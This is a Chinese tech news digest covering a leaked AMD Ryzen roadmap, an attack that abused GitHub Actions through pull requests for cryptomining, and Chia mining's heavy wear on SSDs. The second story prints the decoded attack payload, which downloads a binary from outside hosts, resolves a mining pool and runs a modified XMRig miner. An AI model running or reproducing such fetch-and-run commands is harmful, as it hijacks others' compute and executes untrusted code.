新 闻 ① : AMD路线图进一步泄露, 未来Ryzen 7000系列将配置RDNA 2架构核显

去年网络上曾出现泄漏的AMD路线图,上面出现了许多当时还不为人知的新代号,不过发布的并非完整照片,所以缺少了个别的信息。近期,推特用户@sepeuwmjh发布了图片部分缺失的位置,比照去年泄露的照片,几乎可以确认是同一张,这让人们对AMD的CPU路线规划有了更清晰的了解。

经过推特用户@Olrak29_整理编译后,基本可以详细呈现在大家面前。

打开网易新闻 查看更多图片

从现在掌握的信息来看,最让人感兴趣的是关于Zen 4架构的部分。图片显示未来桌面平台的“Raphael”,也就是“Vermeer”和“Warhol”之后的Ryzen 7000系列,将使用全新的AM5插座及Zen 4架构,同时首次将PCI-E 5.0以及DDR5引入到桌面平台,采用5nm工艺制造,这奠定了未来一段时间内AMD桌面平台的基础。更重要的是,将集成RDNA 2架构的GPU,对于AMD的桌面市场来说是一个比较大的变化,意味着策略的改变,新产品很可能会在明年与大家见面。

在此之前,AMD会推出“Warhol”来接替目前的Ryzen 5000系列, 将采用6nm工艺制造,传闻是7nm工艺的改进型。

移动平台方面,“Rembrandt”将接替目前的“Cezanne”,与桌面平台的“Warhol”相对应都属于Ryzen 6000系列。“Rembrandt”比较大的一个变化是,将配置RDNA 2架构的核显,以取代使用了相当长时间的Vega架构。之后的“Phoenix”将会是移动平台APU上一个重大的变化,Zen 4架构、RDNA 2架构GPU、PCI-E 5.0和DDR5/LPDDR5内存都会悉数登场。

考虑到目前整个半导体行业的供需情况,更让人担心的大概还是产能,这是AMD的路线图是否可以顺利实现的关键。

打开网易新闻 查看更多图片

原文链接:https://m.expreview.com/78628.html

老生常谈的事情我们就先不说了,可以见到AMD确实是要加入新的Zen3+架构,令本应在今年走向终结了AM4平台又延续一年。不过这次曝光的消息却和之前曝光的Zen3+出现了混淆,因为前些时候的消息中指出,Zen3+将会搭载RDNA2核显并支持DDR5内存,如今的消息却说Zen4才是首次支持DDR5的产品。唯一的解释便是Zen3+无核显的普通Ryzen不支持DDR5,而Zen3+ APU支持,但Zen3+ APU的发布时间将晚于Zen4……这显然有些不合理,不知道现实情况到底如何……

新闻 ② : 黑客用GitHub服务器挖矿:三天跑了3万个任务 代码惊现中文

加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?黑客们动起了歪心思——“白嫖”服务器。给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。

而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。

GitHub心里苦啊,虽然可以封禁违规账号,但黑客们玩起了“游击战术”,不断更换马甲号逃避“追捕”,让官方疲于奔命。

就在几天前,一位荷兰的程序员还发现,这种攻击方式依然存在,甚至代码里还出现了中文。

那么,这些黑客是如何植入挖矿程序的呢?一切要从发现异常的法国程序员Tib说起。

PR异常让程序员起疑心

去年11月,Tib发现,自己在一个没有参加的repo上收到了PR请求。而且在14个小时内就收到了7个,全是来自一个“y4ndexhater1”的用户,没有任何描述内容。

打开网易新闻 查看更多图片

令人感到奇怪的是,这并不是一个热门项目,Star数量为0。

打开项目主页发现,内容是Perl项目的github action、circle ci、travis-ci示例代码集合,整个README文档一团糟,根本不像一个正经的开源项目。

然而就是这个混乱又冷门的repo,居然在3天里被fork了2次。

一切都太不正常了,让人嗅到了一丝不安的气息。

尝试“作死”运行

本着“作死”的精神,Tib决定一探究竟。

经过那位可疑用户的操作,Tib所有的action都被删除,在工作流里被加入了一个ci.yml文件,内容如下:

当Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt这一行内容后,立刻从沙发上跳了起来,他意识到事情的严重性:有人在入侵他的GitHub个人资料!

这串看似神秘的字符,其实是base64编码,经过翻译后,得到了另一段代码:

apt update -qq

apt install -y curl git jq

curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog

ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')

chmod u+x prog

timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面两行不必解释,有意思的地方从第三行开始,它会下载一个prog二进制文件。

为了安全起见,Tib先尝试获取信息而不是执行,得到了它的十六进制代码。

$ objdump -s --section .comment prog

prog: file format elf64-x86-64

Contents of section .comment:

0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.

0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1

0020 20323032 30313230 3300 20201203.

Tib也考虑过反编译,但是没有成功。

不入虎穴,焉得虎子,Tib决定尝试运行一下。

要执行这一大胆而又作死的任务,防止“试试就逝世”,Tib首先断开了电脑的网络链接,并选择在Docker容器中运行。

答案终于揭晓,原来这个prog是一个名为XMRig的挖矿程序。

$ ./prog --version

XMRig 6.8.1

built on Feb 3 2021 with GCC 10.2.1

features: 64-bit AES

libuv/1.40.0

OpenSSL/1.1.1i

hwloc/2.4.0

当时XMRig的最新版恰好是6.8.1,和上面的版本参数符合。不过用SHA256检测后发现,这个prog并不完全是XMRig,Tib预测它可能是一个修改版。

实际上,可能被攻击的不止GitHub,安全公司Aqua推测,像Docker Hub、Travis CI、Circle CI这些SaaS软件开发环境,都可能遭受这类攻击。

原文链接:https://m.cnbeta.com/view/1113055.htm

挖矿令人疯狂……之前我们就说过,如果把挖矿这种凭空消耗掉的算力和能源用作科学运算等有意义的事,那会带来多大的改变。结果这些挖矿黑客居然逆推出了将其他用作运算的大型机或服务器反过来用作挖矿的操作??挖矿真的不是三体人搞出来封锁人类科技的吗??不知道这场随矿潮而起挖矿闹剧几时才能结束……

新 闻 ③ : 不止显卡 SSD也被矿工盯上:有人组16TB阵列挖矿

比特币价格回到了6万美元,以太币价格也居高不下,挖矿市场的狂热导致了显卡价格飞涨,RTX 30系高端显卡售价轻松过万。实际上整个币圈有各种各样的加密货币,比特币、以太币靠的是矿机、显卡挖矿,最近又开始流行一种硬盘挖矿,名为chia,是由原来的BitTorrent的创始人Bram Cohen推出的,他在把BitTorrent卖给孙宇晨之后,进军区块链市场推出chia挖矿。

chia挖矿要靠硬盘,算法比其他硬盘矿更高级一些,过程中也需要P盘,只能用CPU P盘,还需要一个快速读写的SSD硬盘做为临时存储盘。

chia挖矿过程中会有大量的磁盘读写操作,100GB的plot文件就需要2TB的读写量,对SSD的消耗非常大。

在Reddit社区上,有人为了chia挖矿,组建了一套豪华的平台,其中CPU是锐龙9 3960X,内存256GB,系统盘是三星980 Pro,仓库盘就是16TB NVMe硬盘,还配备了1000W电源。

考虑到chia挖矿现在还是小众,很多人并不了解,也没有参与挖矿,一旦做大,那么对SSD硬盘的需求也会迅速增加,现在全网就相当于3万块10TB硬盘在跑了,以后需要还会更多。

不同于显卡挖矿,SSD硬盘的读写寿命是有限的,chia这种疯狂的操作量对SSD寿命影响很大,二手的坑就大多了,不得不防。

打开网易新闻 查看更多图片

原文链接:https://m.cnbeta.com/view/1113523.htm

是,这也是疯狂的挖矿产物。事实上在2017年那次矿潮中,这种硬盘币就已经诞生了,它们的算法相比于传统的虚拟货币要简单的多,自然价值也要低不少。不过在疯狂的矿潮之下,但凡和区块链概念沾点边的东西都会被疯狂渲染……目前来看这次矿潮不论规模还是影响都要远超上次,估计又要有一堆新概念的山寨币诞生了……

小问题后台问

大问题↓

欢迎加入电脑吧官方五群:820217939

欢迎电脑吧二手硬件交流群:819905492

关注B站@电脑吧评测室,@翼王或微博@渐缜JZ,@DDAA117

备注

文章转载自网络(链接如上)。文章出现的任何图片,标志均属于其合法持有人;本文仅作传递信息之用。如有侵权可在本文内留言。

引用文章内容与观点不代表电脑吧评测室观点。